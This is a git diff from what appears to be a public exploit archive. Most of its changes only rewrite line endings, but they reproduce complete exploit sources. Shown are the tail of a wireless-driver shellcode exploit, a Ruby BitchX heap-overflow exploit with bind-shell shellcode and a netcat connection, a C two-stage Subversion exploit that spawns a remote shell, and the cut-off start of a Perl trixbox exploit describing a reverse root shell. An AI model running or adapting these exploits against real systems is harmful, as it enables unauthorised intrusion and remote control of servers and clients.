= 0; + ppacket[26] = 2; + ppacket[27] = 0; + + txp.plen = 512 + (ppacket - packet); + if (tx80211_txpacket(&tx, &txp) < txp.plen) { + fprintf(stderr, "Error sending packet 1\n"); + return 1; + } + + ppacket[26] = 4; + + if (tx80211_txpacket(&tx, &txp) < txp.plen) { + fprintf(stderr, "Error sending packet 2\n"); + return 1; + } + + // Insert shellcode at end of nopsled + memcpy(ppacket+(820-sizeof(shellcode)), shellcode, sizeof(shellcode)); + + // Overwrite some char*, needs to be a valid address + memcpy(ppacket+1028, &ret_addr, 4); + + // Overwrite global variable sk_len, used as argument to memcpy + memcpy(ppacket+1032, "\x20\x05\x00\x00", 4); + + // Return address + memcpy(ppacket+820, &ret_addr, 4); + + ppacket[1] = 0x40; + txp.plen = 1036 + + (ppacket - packet); + + if (tx80211_txpacket(&tx, &txp) < txp.plen) { + fprintf(stderr, "Error sending packet 3\n"); + return 1; + } + + tx80211_close(&tx); + + return 0; +} + +// milw0rm.com [2007-04-12] diff --git a/platforms/linux/remote/413.c b/platforms/linux/remote/413.c index fafd29011..d70a7df95 100755 --- a/platforms/linux/remote/413.c +++ b/platforms/linux/remote/413.c @@ -180,6 +180,6 @@ close(sock); return 0; } -return 0; } - -// milw0rm.com [2004-08-24] +return 0; } + +// milw0rm.com [2004-08-24] diff --git a/platforms/linux/remote/4321.rb b/platforms/linux/remote/4321.rb index 9adfb17fd..b7ff55470 100755 --- a/platforms/linux/remote/4321.rb +++ b/platforms/linux/remote/4321.rb @@ -1,123 +1,123 @@ -#!/usr/bin/env ruby -###################################################### -# BitchX-1.1 Final MODE Heap Overflow [0-day] -# By bannedit -# Discovered May 16th 2007 -# - Yet another overflow which can overwrite GOT -# -# I found this vuln after modifying ilja's ircfuzz -# code. Currently this exploit attempts to -# overwrite the GOT with the ret address to the -# shellcode. -# -# The actually vulnerability appears to be a stack -# overflow in p_mode. Due to input size restrictions -# the overflow can't occur on the stack because we can -# only overflow so much data. Luckily though we -# overwrite a structure containing pointers to heap -# data. This allows us to overwrite the GOT. -# -# Reliability of this exploit in its current stage is -# limited. There appears to be several factors which -# restrict the reliability. -####################################################### - -require 'socket' - -#the linux 2.6 target most effective atm -targets = { 'linux 2.6' => '0x81861c8', 'linux 2.6 Hardened (FC6)' => -'0x8154d70','freebsd' => '0x41414141' } - -shellcode = #fork before binding a shell provides a clean exit - "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80"+ - - #metasploit linux x86 shellcode bind tcp port 4444 - "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfc"+ - "\x98\xd8\xb8\x83\xeb\xfc\xe2\xf4\xcd\x43\x8b\xfb\xaf\xf2\xda\xd2"+ - "\x9a\xc0\x41\x31\x1d\x55\x58\x2e\xbf\xca\xbe\xd0\xed\xc4\xbe\xeb"+ - "\x75\x79\xb2\xde\xa4\xc8\x89\xee\x75\x79\x15\x38\x4c\xfe\x09\x5b"+ - "\x31\x18\x8a\xea\xaa\xdb\x51\x59\x4c\xfe\x15\x38\x6f\xf2\xda\xe1"+ - "\x4c\xa7\x15\x38\xb5\xe1\x21\x08\xf7\xca\xb0\x97\xd3\xeb\xb0\xd0"+ - "\xd3\xfa\xb1\xd6\x75\x7b\x8a\xeb\x75\x79\x15\x38" - - -port = (ARGV[0] || 6667).to_i -sock = TCPServer.new('0.0.0.0', port) - -ret = (targets['linux 2.6 Hardened (FC6)'].hex) - -puts "----------------------------------------------" -puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -" -puts "- By bannedit -" -puts "----------------------------------------------" - - -puts "\n[-] listening for incoming clients..." - -while (client = sock.accept) - ip = client.peeraddr - - buffer = client.gets - puts "[<] #{buffer}" - - hostname = ([ret].pack('V')) * 13 - nick = "bannedit" - - #Fake server reply to connection - buffer = ":#{nick} MODE #{nick} :+iw\r\n"+ - ":0 001 #{nick} :biznitch-1.0\r\n"+ - ":5 002 #{nick} :biznitch-1.0\r\n"+ - ":6 003 #{nick} :a\r\n"+ - ":aaa 004 #{nick} :a\r\n"+ - ":aaa 005 #{nick} :a\r\n"+ - ":aaa 251 #{nick} :a\r\n"+ - ":aaa 252 #{nick} :a\r\n"+ - ":aaa 253 #{nick} :a\r\n"+ - ":aaa 254 #{nick} :a\r\n"+ - ":aaa 255 #{nick} :a\r\n"+ - ":aaa 375 #{nick} :a\r\n"+ - ":aaa 372 #{nick} :a\r\n"+ - ":aaa 376 #{nick} :a\r\n" - - join = ":aaa 302 #{nick} :#{nick}=+#{nick}@#{nick}\r\n"+ - ":#{nick}!#{nick}@#{hostname * 4} JOIN :#hackers\r\n" - - puts "[>] sending fake server response" - client.send(buffer, 0) - sleep(2) -# client.send(join, 0) - - topic = ":aaa TOPIC #hackers:" - ret = ret + 0x200 - topic<< ([ret].pack('V')) * 100 - topic<< "\r\n" - for i in 0..20 - client.send(topic, 0) - end - - puts "[>] sending evil buffer" - evilbuf = ":#{hostname} MODE " - evilbuf<< "#{nick} :aaa" - ret = ret + 0x200 - evilbuf<< ([ret].pack('V')) * 200 - evilbuf<< "\x90" * (1126 - shellcode.length) - evilbuf<< shellcode - evilbuf<< "\x90" * 40 - evilbuf<< "\r\n" - - for i in 0..5 - client.send(evilbuf, 0) - end - -sleep(10) #wait for the shellcode to do its thing... - -puts "[+] exploit completed if successful port 4444 should be open" -puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell...\n\n" - - fork { - system("nc #{ip[3]} 4444") - puts "[+] exiting shell dropping back to listener" - } -end - -# milw0rm.com [2007-08-27] +#!/usr/bin/env ruby +###################################################### +# BitchX-1.1 Final MODE Heap Overflow [0-day] +# By bannedit +# Discovered May 16th 2007 +# - Yet another overflow which can overwrite GOT +# +# I found this vuln after modifying ilja's ircfuzz +# code. Currently this exploit attempts to +# overwrite the GOT with the ret address to the +# shellcode. +# +# The actually vulnerability appears to be a stack +# overflow in p_mode. Due to input size restrictions +# the overflow can't occur on the stack because we can +# only overflow so much data. Luckily though we +# overwrite a structure containing pointers to heap +# data. This allows us to overwrite the GOT. +# +# Reliability of this exploit in its current stage is +# limited. There appears to be several factors which +# restrict the reliability. +####################################################### + +require 'socket' + +#the linux 2.6 target most effective atm +targets = { 'linux 2.6' => '0x81861c8', 'linux 2.6 Hardened (FC6)' => +'0x8154d70','freebsd' => '0x41414141' } + +shellcode = #fork before binding a shell provides a clean exit + "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80"+ + + #metasploit linux x86 shellcode bind tcp port 4444 + "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfc"+ + "\x98\xd8\xb8\x83\xeb\xfc\xe2\xf4\xcd\x43\x8b\xfb\xaf\xf2\xda\xd2"+ + "\x9a\xc0\x41\x31\x1d\x55\x58\x2e\xbf\xca\xbe\xd0\xed\xc4\xbe\xeb"+ + "\x75\x79\xb2\xde\xa4\xc8\x89\xee\x75\x79\x15\x38\x4c\xfe\x09\x5b"+ + "\x31\x18\x8a\xea\xaa\xdb\x51\x59\x4c\xfe\x15\x38\x6f\xf2\xda\xe1"+ + "\x4c\xa7\x15\x38\xb5\xe1\x21\x08\xf7\xca\xb0\x97\xd3\xeb\xb0\xd0"+ + "\xd3\xfa\xb1\xd6\x75\x7b\x8a\xeb\x75\x79\x15\x38" + + +port = (ARGV[0] || 6667).to_i +sock = TCPServer.new('0.0.0.0', port) + +ret = (targets['linux 2.6 Hardened (FC6)'].hex) + +puts "----------------------------------------------" +puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -" +puts "- By bannedit -" +puts "----------------------------------------------" + + +puts "\n[-] listening for incoming clients..." + +while (client = sock.accept) + ip = client.peeraddr + + buffer = client.gets + puts "[<] #{buffer}" + + hostname = ([ret].pack('V')) * 13 + nick = "bannedit" + + #Fake server reply to connection + buffer = ":#{nick} MODE #{nick} :+iw\r\n"+ + ":0 001 #{nick} :biznitch-1.0\r\n"+ + ":5 002 #{nick} :biznitch-1.0\r\n"+ + ":6 003 #{nick} :a\r\n"+ + ":aaa 004 #{nick} :a\r\n"+ + ":aaa 005 #{nick} :a\r\n"+ + ":aaa 251 #{nick} :a\r\n"+ + ":aaa 252 #{nick} :a\r\n"+ + ":aaa 253 #{nick} :a\r\n"+ + ":aaa 254 #{nick} :a\r\n"+ + ":aaa 255 #{nick} :a\r\n"+ + ":aaa 375 #{nick} :a\r\n"+ + ":aaa 372 #{nick} :a\r\n"+ + ":aaa 376 #{nick} :a\r\n" + + join = ":aaa 302 #{nick} :#{nick}=+#{nick}@#{nick}\r\n"+ + ":#{nick}!#{nick}@#{hostname * 4} JOIN :#hackers\r\n" + + puts "[>] sending fake server response" + client.send(buffer, 0) + sleep(2) +# client.send(join, 0) + + topic = ":aaa TOPIC #hackers:" + ret = ret + 0x200 + topic<< ([ret].pack('V')) * 100 + topic<< "\r\n" + for i in 0..20 + client.send(topic, 0) + end + + puts "[>] sending evil buffer" + evilbuf = ":#{hostname} MODE " + evilbuf<< "#{nick} :aaa" + ret = ret + 0x200 + evilbuf<< ([ret].pack('V')) * 200 + evilbuf<< "\x90" * (1126 - shellcode.length) + evilbuf<< shellcode + evilbuf<< "\x90" * 40 + evilbuf<< "\r\n" + + for i in 0..5 + client.send(evilbuf, 0) + end + +sleep(10) #wait for the shellcode to do its thing... + +puts "[+] exploit completed if successful port 4444 should be open" +puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell...\n\n" + + fork { + system("nc #{ip[3]} 4444") + puts "[+] exiting shell dropping back to listener" + } +end + +# milw0rm.com [2007-08-27] diff --git a/platforms/linux/remote/4537.c b/platforms/linux/remote/4537.c index aea3c80c0..b91eae7b6 100755 --- a/platforms/linux/remote/4537.c +++ b/platforms/linux/remote/4537.c @@ -1,328 +1,328 @@ -/***************************************************************** - * hoagie_subversion.c - * - * Remote exploit against Subversion-Servers. - * - * Author: greuff - * - * Tested on Subversion 1.0.0 and 0.37 - * - * Algorithm: - * This is a two-stage exploit. The first stage overflows a buffer - * on the stack and leaves us ~60 bytes of machine code to be - * executed. We try to find the socket-fd there and then do a - * read(2) on the socket. The exploit then sends the second stage - * loader to the server, which can be of any length (up to the - * obvious limits, of course). This second stage loader spawns - * /bin/sh on the server and connects it to the socket-fd. - * - * Credits: - * void.at - * - * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT. - * THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR - * CRIMINAL ACTIVITIES DONE USING THIS PROGRAM. - * - *****************************************************************/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -enum protocol { SVN, SVNSSH, HTTP, HTTPS }; - -char stage1loader[]= - // begin socket fd search - "\x31\xdb" // xor %ebx, %ebx - "\x90" // nop (UTF-8) - "\x53" // push %ebx - "\x58" // pop %eax - "\x50" // push %eax - "\x5f" // pop %edi # %eax = %ebx = %edi = 0 - "\x2c\x40" // sub $0x40, %al - "\x50" // push %eax - "\x5b" // pop %ebx - "\x50" // push %eax - "\x5a" // pop %edx # %ebx = %edx = 0xC0 - "\x57" // push %edi - "\x57" // push %edi # safety-0 - "\x54" // push %esp - "\x59" // pop %ecx # %ecx = pointer to the buffer - "\x4b" // dec %ebx # beginloop: - "\x57" // push %edi - "\x58" // pop %eax # clear %eax - "\xd6" // salc (UTF-8) - "\xb0\x60" // movb $0x60, %al - "\x2c\x44" // sub $0x44, %al # %eax = 0x1C - "\xcd\x80" // int $0x80 # fstat(i, &stat) - "\x58" // pop %eax - "\x58" // pop %eax - "\x50" // push %eax - "\x50" // push %eax - "\x38\xd4" // cmp %dl, %ah # uppermost 2 bits of st_mode set? - "\x90" // nop (UTF-8) - "\x72\xed" // jb beginloop - "\x90" // nop (UTF-8) - "\x90" // nop (UTF-8) # %ebx now contains the socket fd - // begin read(2) - "\x57" // push %edi - "\x58" // pop %eax # zero %eax - "\x40" // inc %eax - "\x40" // inc %eax - "\x40" // inc %eax # %eax=3 - //"\x54" // push %esp - //"\x59" // pop %ecx # %ecx ... address of buffer - //"\x54" // push %edi - //"\x5a" // pop %edx # %edx ... bufferlen (0xC0) - "\xcd\x80" // int $0x80 # read(2) second stage loader - "\x39\xc7" // cmp %eax, %edi - "\x90" // nop (UTF-8) - "\x7f\xf3" // jg startover - "\x90" // nop (UTF-8) - "\x90" // nop (UTF-8) - "\x90" // nop (UTF-8) - "\x54" // push %esp - "\xc3" // ret # execute second stage loader - "\x90" // nop (UTF-8) - "\0" // %ebx still contains the fd we can use in the 2nd stage loader. - ; - -char stage2loader[]= - // dup2 - %ebx contains the fd - "\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax - "\xb9\x00\x00\x00\x00" // mov $0x0, %ecx - "\xcd\x80" // int $0x80 - "\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax - "\xb9\x01\x00\x00\x00" // mov $0x1, %ecx - "\xcd\x80" // int $0x80 - "\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax - "\xb9\x02\x00\x00\x00" // mov $0x2, %ecx - "\xcd\x80" // int $0x80 - // start /bin/sh - "\x31\xd2" // xor %edx, %edx - "\x52" // push %edx - "\x68\x6e\x2f\x73\x68" // push $0x68732f6e - "\x68\x2f\x2f\x62\x69" // push $0x69622f2f - "\x89\xe3" // mov %esp, %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp, %ecx - "\xb8\x0b\x00\x00\x00" // mov $0xb, %eax - "\xcd\x80" // int $0x80 - "\xb8\x01\x00\x00\x00" // mov $0x1, %eax - "\xcd\x80" // int %0x80 (exit) - ; - -int stage2loaderlen=69; - -char requestfmt[]= -"REPORT %s HTTP/1.1\n" -"Host: %s\n" -"User-Agent: SVN/0.37.0 (r8509) neon/0.24.4\n" -"Content-Length: %d\n" -"Content-Type: text/xml\n" -"Connection: close\n\n" -"%s\n"; - -char xmlreqfmt[]= -"" -"" -"%s%c%c%c%c" -""; - -int parse_uri(char *uri,enum protocol *proto,char host[1000],int *port,char repos[1000]) -{ - char *ptr; - char bfr[1000]; - - ptr=strstr(uri,"://"); - if(!ptr) return -1; - *ptr=0; - snprintf(bfr,sizeof(bfr),"%s",uri); - if(!strcmp(bfr,"http")) - *proto=HTTP, *port=80; - else if(!strcmp(bfr,"svn")) - *proto=SVN, *port=3690; - else - { - printf("Unsupported protocol %s\n",bfr); - return -1; - } - uri=ptr+3; - if((ptr=strchr(uri,':'))) - { - *ptr=0; - snprintf(host,1000,"%s",uri); - uri=ptr+1; - if((ptr=strchr(uri,'/'))==NULL) return -1; - *ptr=0; - snprintf(bfr,1000,"%s",uri); - *port=(int)strtol(bfr,NULL,10); - *ptr='/'; - uri=ptr; - } - else if((ptr=strchr(uri,'/'))) - { - *ptr=0; - snprintf(host,1000,"%s",uri); - *ptr='/'; - uri=ptr; - } - snprintf(repos,1000,"%s",uri); - return 0; -} - -int exec_sh(int sockfd) -{ - char snd[4096],rcv[4096]; - fd_set rset; - while(1) - { - FD_ZERO(&rset); - FD_SET(fileno(stdin),&rset); - FD_SET(sockfd,&rset); - select(255,&rset,NULL,NULL,NULL); - if(FD_ISSET(fileno(stdin),&rset)) - { - memset(snd,0,sizeof(snd)); - fgets(snd,sizeof(snd),stdin); - write(sockfd,snd,strlen(snd)); - } - if(FD_ISSET(sockfd,&rset)) - { - memset(rcv,0,sizeof(rcv)); - if(read(sockfd,rcv,sizeof(rcv))<=0) - exit(0); - fputs(rcv,stdout); - } - } -} - -int main(int argc, char **argv) -{ - int sock, port; - size_t size; - char cmd[1000], reply[1000], buffer[1000]; - char svdcmdline[1000]; - char host[1000], repos[1000], *ptr, *caddr; - unsigned long addr; - struct sockaddr_in sin; - struct hostent *he; - enum protocol proto; - - /*sock=open("output",O_CREAT|O_TRUNC|O_RDWR,0666); - write(sock,stage1loader,strlen(stage1loader)); - close(sock); - return 0;*/ - - printf("hoagie_subversion - remote exploit against subversion servers\n" - "by greuff@void.at\n\n"); - if(argc!=3) - { - printf("Usage: %s serverurl offset\n\n",argv[0]); - printf("Examples:\n" - " %s svn://localhost/repository 0x41414141\n" - " %s http://victim.com:6666/svn 0x40414336\n\n",argv[0],argv[0]); - printf("The offset is an alphanumeric address (or UTF-8 to be\n" - "more precise) of a pop instruction, followed by a ret.\n" - "Brute force when in doubt.\n\n"); - printf("When exploiting against an svn://-url, you can supply a\n" - "binary offset too.\n\n"); - exit(1); - } - - // parse the URI - snprintf(svdcmdline,sizeof(svdcmdline),"%s",argv[1]); - if(parse_uri(argv[1],&proto,host,&port,repos)<0) - { - printf("URI parse error\n"); - exit(1); - } - printf("parse_uri result:\n" - "Protocol: %d\n" - "Host: %s\n" - "Port: %d\n" - "Repository: %s\n\n",proto,host,port,repos); - addr=strtoul(argv[2],NULL,16); - caddr=(char *)&addr; - printf("Using offset 0x%02x%02x%02x%02x\n",caddr[3],caddr[2],caddr[1],caddr[0]); - - sock=socket(AF_INET,SOCK_STREAM,0); - if(sock<0) - { - perror("socket"); - return -1; - } - - he=gethostbyname(host); - if(he==NULL) - { - herror("gethostbyname"); - return -1; - } - sin.sin_family=AF_INET; - sin.sin_port=htons(port); - memcpy(&sin.sin_addr.s_addr,he->h_addr,sizeof(he->h_addr)); - if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0) - { - perror("connect"); - return -1; - } - - if(proto==SVN) - { - size=read(sock,reply,sizeof(reply)); - reply[size]=0; - printf("Server said: %s\n",reply); - snprintf(cmd,sizeof(cmd),"( 2 ( edit-pipeline ) %d:%s ) ",strlen(svdcmdline),svdcmdline); - write(sock,cmd,strlen(cmd)); - size=read(sock,reply,sizeof(reply)); - reply[size]=0; - printf("Server said: %s\n",reply); - strcpy(cmd,"( ANONYMOUS ( 0: ) ) "); - write(sock,cmd,strlen(cmd)); - size=read(sock,reply,sizeof(reply)); - reply[size]=0; - printf("Server said: %s\n",reply); - snprintf(cmd,sizeof(cmd),"( get-dated-rev ( %d:%s%c%c%c%c ) ) ",strlen(stage1loader)+4,stage1loader, - caddr[0],caddr[1],caddr[2],caddr[3]); - write(sock,cmd,strlen(cmd)); - size=read(sock,reply,sizeof(reply)); - reply[size]=0; - printf("Server said: %s\n",reply); - } - else if(proto==HTTP) - { - // preparing the request... - snprintf(buffer,sizeof(buffer),xmlreqfmt,stage1loader, - caddr[0],caddr[1],caddr[2],caddr[3]); - size=strlen(buffer); - snprintf(cmd,sizeof(cmd),requestfmt,repos,host,size,buffer); - - // now sending the request, immediately followed by the 2nd stage loader - printf("Sending:\n%s",cmd); - write(sock,cmd,strlen(cmd)); - sleep(1); - write(sock,stage2loader,stage2loaderlen); - } - - // SHELL LOOP - printf("Entering shell loop...\n"); - exec_sh(sock); - - /*sleep(1); - close(sock); - printf("\nConnecting to the shell...\n"); - exec_sh(connect_sh()); */ - return 0; -} - -// milw0rm.com [2005-05-03] +/***************************************************************** + * hoagie_subversion.c + * + * Remote exploit against Subversion-Servers. + * + * Author: greuff + * + * Tested on Subversion 1.0.0 and 0.37 + * + * Algorithm: + * This is a two-stage exploit. The first stage overflows a buffer + * on the stack and leaves us ~60 bytes of machine code to be + * executed. We try to find the socket-fd there and then do a + * read(2) on the socket. The exploit then sends the second stage + * loader to the server, which can be of any length (up to the + * obvious limits, of course). This second stage loader spawns + * /bin/sh on the server and connects it to the socket-fd. + * + * Credits: + * void.at + * + * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT. + * THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR + * CRIMINAL ACTIVITIES DONE USING THIS PROGRAM. + * + *****************************************************************/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +enum protocol { SVN, SVNSSH, HTTP, HTTPS }; + +char stage1loader[]= + // begin socket fd search + "\x31\xdb" // xor %ebx, %ebx + "\x90" // nop (UTF-8) + "\x53" // push %ebx + "\x58" // pop %eax + "\x50" // push %eax + "\x5f" // pop %edi # %eax = %ebx = %edi = 0 + "\x2c\x40" // sub $0x40, %al + "\x50" // push %eax + "\x5b" // pop %ebx + "\x50" // push %eax + "\x5a" // pop %edx # %ebx = %edx = 0xC0 + "\x57" // push %edi + "\x57" // push %edi # safety-0 + "\x54" // push %esp + "\x59" // pop %ecx # %ecx = pointer to the buffer + "\x4b" // dec %ebx # beginloop: + "\x57" // push %edi + "\x58" // pop %eax # clear %eax + "\xd6" // salc (UTF-8) + "\xb0\x60" // movb $0x60, %al + "\x2c\x44" // sub $0x44, %al # %eax = 0x1C + "\xcd\x80" // int $0x80 # fstat(i, &stat) + "\x58" // pop %eax + "\x58" // pop %eax + "\x50" // push %eax + "\x50" // push %eax + "\x38\xd4" // cmp %dl, %ah # uppermost 2 bits of st_mode set? + "\x90" // nop (UTF-8) + "\x72\xed" // jb beginloop + "\x90" // nop (UTF-8) + "\x90" // nop (UTF-8) # %ebx now contains the socket fd + // begin read(2) + "\x57" // push %edi + "\x58" // pop %eax # zero %eax + "\x40" // inc %eax + "\x40" // inc %eax + "\x40" // inc %eax # %eax=3 + //"\x54" // push %esp + //"\x59" // pop %ecx # %ecx ... address of buffer + //"\x54" // push %edi + //"\x5a" // pop %edx # %edx ... bufferlen (0xC0) + "\xcd\x80" // int $0x80 # read(2) second stage loader + "\x39\xc7" // cmp %eax, %edi + "\x90" // nop (UTF-8) + "\x7f\xf3" // jg startover + "\x90" // nop (UTF-8) + "\x90" // nop (UTF-8) + "\x90" // nop (UTF-8) + "\x54" // push %esp + "\xc3" // ret # execute second stage loader + "\x90" // nop (UTF-8) + "\0" // %ebx still contains the fd we can use in the 2nd stage loader. + ; + +char stage2loader[]= + // dup2 - %ebx contains the fd + "\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax + "\xb9\x00\x00\x00\x00" // mov $0x0, %ecx + "\xcd\x80" // int $0x80 + "\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax + "\xb9\x01\x00\x00\x00" // mov $0x1, %ecx + "\xcd\x80" // int $0x80 + "\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax + "\xb9\x02\x00\x00\x00" // mov $0x2, %ecx + "\xcd\x80" // int $0x80 + // start /bin/sh + "\x31\xd2" // xor %edx, %edx + "\x52" // push %edx + "\x68\x6e\x2f\x73\x68" // push $0x68732f6e + "\x68\x2f\x2f\x62\x69" // push $0x69622f2f + "\x89\xe3" // mov %esp, %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp, %ecx + "\xb8\x0b\x00\x00\x00" // mov $0xb, %eax + "\xcd\x80" // int $0x80 + "\xb8\x01\x00\x00\x00" // mov $0x1, %eax + "\xcd\x80" // int %0x80 (exit) + ; + +int stage2loaderlen=69; + +char requestfmt[]= +"REPORT %s HTTP/1.1\n" +"Host: %s\n" +"User-Agent: SVN/0.37.0 (r8509) neon/0.24.4\n" +"Content-Length: %d\n" +"Content-Type: text/xml\n" +"Connection: close\n\n" +"%s\n"; + +char xmlreqfmt[]= +"" +"" +"%s%c%c%c%c" +""; + +int parse_uri(char *uri,enum protocol *proto,char host[1000],int *port,char repos[1000]) +{ + char *ptr; + char bfr[1000]; + + ptr=strstr(uri,"://"); + if(!ptr) return -1; + *ptr=0; + snprintf(bfr,sizeof(bfr),"%s",uri); + if(!strcmp(bfr,"http")) + *proto=HTTP, *port=80; + else if(!strcmp(bfr,"svn")) + *proto=SVN, *port=3690; + else + { + printf("Unsupported protocol %s\n",bfr); + return -1; + } + uri=ptr+3; + if((ptr=strchr(uri,':'))) + { + *ptr=0; + snprintf(host,1000,"%s",uri); + uri=ptr+1; + if((ptr=strchr(uri,'/'))==NULL) return -1; + *ptr=0; + snprintf(bfr,1000,"%s",uri); + *port=(int)strtol(bfr,NULL,10); + *ptr='/'; + uri=ptr; + } + else if((ptr=strchr(uri,'/'))) + { + *ptr=0; + snprintf(host,1000,"%s",uri); + *ptr='/'; + uri=ptr; + } + snprintf(repos,1000,"%s",uri); + return 0; +} + +int exec_sh(int sockfd) +{ + char snd[4096],rcv[4096]; + fd_set rset; + while(1) + { + FD_ZERO(&rset); + FD_SET(fileno(stdin),&rset); + FD_SET(sockfd,&rset); + select(255,&rset,NULL,NULL,NULL); + if(FD_ISSET(fileno(stdin),&rset)) + { + memset(snd,0,sizeof(snd)); + fgets(snd,sizeof(snd),stdin); + write(sockfd,snd,strlen(snd)); + } + if(FD_ISSET(sockfd,&rset)) + { + memset(rcv,0,sizeof(rcv)); + if(read(sockfd,rcv,sizeof(rcv))<=0) + exit(0); + fputs(rcv,stdout); + } + } +} + +int main(int argc, char **argv) +{ + int sock, port; + size_t size; + char cmd[1000], reply[1000], buffer[1000]; + char svdcmdline[1000]; + char host[1000], repos[1000], *ptr, *caddr; + unsigned long addr; + struct sockaddr_in sin; + struct hostent *he; + enum protocol proto; + + /*sock=open("output",O_CREAT|O_TRUNC|O_RDWR,0666); + write(sock,stage1loader,strlen(stage1loader)); + close(sock); + return 0;*/ + + printf("hoagie_subversion - remote exploit against subversion servers\n" + "by greuff@void.at\n\n"); + if(argc!=3) + { + printf("Usage: %s serverurl offset\n\n",argv[0]); + printf("Examples:\n" + " %s svn://localhost/repository 0x41414141\n" + " %s http://victim.com:6666/svn 0x40414336\n\n",argv[0],argv[0]); + printf("The offset is an alphanumeric address (or UTF-8 to be\n" + "more precise) of a pop instruction, followed by a ret.\n" + "Brute force when in doubt.\n\n"); + printf("When exploiting against an svn://-url, you can supply a\n" + "binary offset too.\n\n"); + exit(1); + } + + // parse the URI + snprintf(svdcmdline,sizeof(svdcmdline),"%s",argv[1]); + if(parse_uri(argv[1],&proto,host,&port,repos)<0) + { + printf("URI parse error\n"); + exit(1); + } + printf("parse_uri result:\n" + "Protocol: %d\n" + "Host: %s\n" + "Port: %d\n" + "Repository: %s\n\n",proto,host,port,repos); + addr=strtoul(argv[2],NULL,16); + caddr=(char *)&addr; + printf("Using offset 0x%02x%02x%02x%02x\n",caddr[3],caddr[2],caddr[1],caddr[0]); + + sock=socket(AF_INET,SOCK_STREAM,0); + if(sock<0) + { + perror("socket"); + return -1; + } + + he=gethostbyname(host); + if(he==NULL) + { + herror("gethostbyname"); + return -1; + } + sin.sin_family=AF_INET; + sin.sin_port=htons(port); + memcpy(&sin.sin_addr.s_addr,he->h_addr,sizeof(he->h_addr)); + if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0) + { + perror("connect"); + return -1; + } + + if(proto==SVN) + { + size=read(sock,reply,sizeof(reply)); + reply[size]=0; + printf("Server said: %s\n",reply); + snprintf(cmd,sizeof(cmd),"( 2 ( edit-pipeline ) %d:%s ) ",strlen(svdcmdline),svdcmdline); + write(sock,cmd,strlen(cmd)); + size=read(sock,reply,sizeof(reply)); + reply[size]=0; + printf("Server said: %s\n",reply); + strcpy(cmd,"( ANONYMOUS ( 0: ) ) "); + write(sock,cmd,strlen(cmd)); + size=read(sock,reply,sizeof(reply)); + reply[size]=0; + printf("Server said: %s\n",reply); + snprintf(cmd,sizeof(cmd),"( get-dated-rev ( %d:%s%c%c%c%c ) ) ",strlen(stage1loader)+4,stage1loader, + caddr[0],caddr[1],caddr[2],caddr[3]); + write(sock,cmd,strlen(cmd)); + size=read(sock,reply,sizeof(reply)); + reply[size]=0; + printf("Server said: %s\n",reply); + } + else if(proto==HTTP) + { + // preparing the request... + snprintf(buffer,sizeof(buffer),xmlreqfmt,stage1loader, + caddr[0],caddr[1],caddr[2],caddr[3]); + size=strlen(buffer); + snprintf(cmd,sizeof(cmd),requestfmt,repos,host,size,buffer); + + // now sending the request, immediately followed by the 2nd stage loader + printf("Sending:\n%s",cmd); + write(sock,cmd,strlen(cmd)); + sleep(1); + write(sock,stage2loader,stage2loaderlen); + } + + // SHELL LOOP + printf("Entering shell loop...\n"); + exec_sh(sock); + + /*sleep(1); + close(sock); + printf("\nConnecting to the shell...\n"); + exec_sh(connect_sh()); */ + return 0; +} + +// milw0rm.com [2005-05-03] diff --git a/platforms/linux/remote/6026.pl b/platforms/linux/remote/6026.pl index 16df19d57..1ec4cf31a 100755 --- a/platforms/linux/remote/6026.pl +++ b/platforms/linux/remote/6026.pl @@ -1,134 +1,134 @@ -#!/usr/bin/perl -w - -# Jean-Michel BESNARD / LEXSI Audit -# 2008-07-09 -# This is an update of the previous exploit. We can now get a root shell, thanks to sudo. -# -# perl trixbox_fi_v2.pl 192.168.1.212 -# Please listen carefully as our menu option has changed -# Choose from the following options: -# 1> Remote TCP shell -# 2> Read local file -# 1 -# Host and port the reverse shell should connect to ? (:): 192.168.1.132:4444 -# Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk] -# root -# Make sure you've opened a server socket on port 4444 at 192.168.1.132 (e.g, nc -l -p 4444) -# Press enter to continue... -# done... - -# nc -l -v -p 4444 -# listening on [any] 4444 ... -# connect to [192.168.1.132] from lexsi-abo-new.lexsi.com [192.168.1.212] 48397 -# bash: no job control in this shell -# bash-3.1# id -# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) -# bash-3.1# - - -use strict; -use Switch; -use LWP::UserAgent; -use HTTP::Cookies; - -usage() unless @ARGV; -my $url = "http://$ARGV[0]/user/index.php"; -my $ua = LWP::UserAgent->new; -my $cookie_jar = HTTP::Cookies->new; -$ua->cookie_jar($cookie_jar); - -menu(); - -sub execScript{ - my $scriptCode = shift; - post($scriptCode); - my $phpsessionid = extractPHPSID($cookie_jar->as_string); - post("langChoice=../../../../../../../../../../tmp/sess_$phpsessionid%00"); -} - -sub post{ - my $postData = shift; - my $req = 